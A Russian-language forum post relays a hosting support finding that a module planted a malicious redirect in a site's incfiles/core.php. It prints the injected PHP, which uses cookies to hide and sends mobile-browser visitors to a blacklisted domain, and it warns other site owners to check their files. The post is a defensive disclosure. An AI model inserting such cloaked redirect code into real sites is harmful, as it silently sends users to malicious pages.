С редиректом проблема решена. Вот что ответили в тех.поддержке
В файле delowap.ru/incfiles/core.php найден редирект на вредоносный сайт - httр://орerauрdt.ru/
Этот сайт находится в черном списке dr.Web
Так же если ввести этот адрес в поисковик, найдется десятки случаев с этим же доменом, на разных хостингах.
А вот собственно сам вредоносный код
if($_SERVER['HTTP_REFERER'] =='')
{@setcookie("dir", 1, time()+60*60*24*7*30);}
elseif(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["adv"] != 1 && $_COOKIE["dir"] != 1)
{
@setcookie("adv", 1, time()+60*60*24*7);
@header("Location: httр://орerauрdt.ru/");
}А теперь самое главное - этот код я мог загрузить только с каким-то модулем. Поскольку я все модули беру только на этом сайте, значит кто-то из авторов всунул туда этот код. Проверяйте incfiles/core.php в самом начале, у кого-то тоже может быть такое, а вы и не знаете.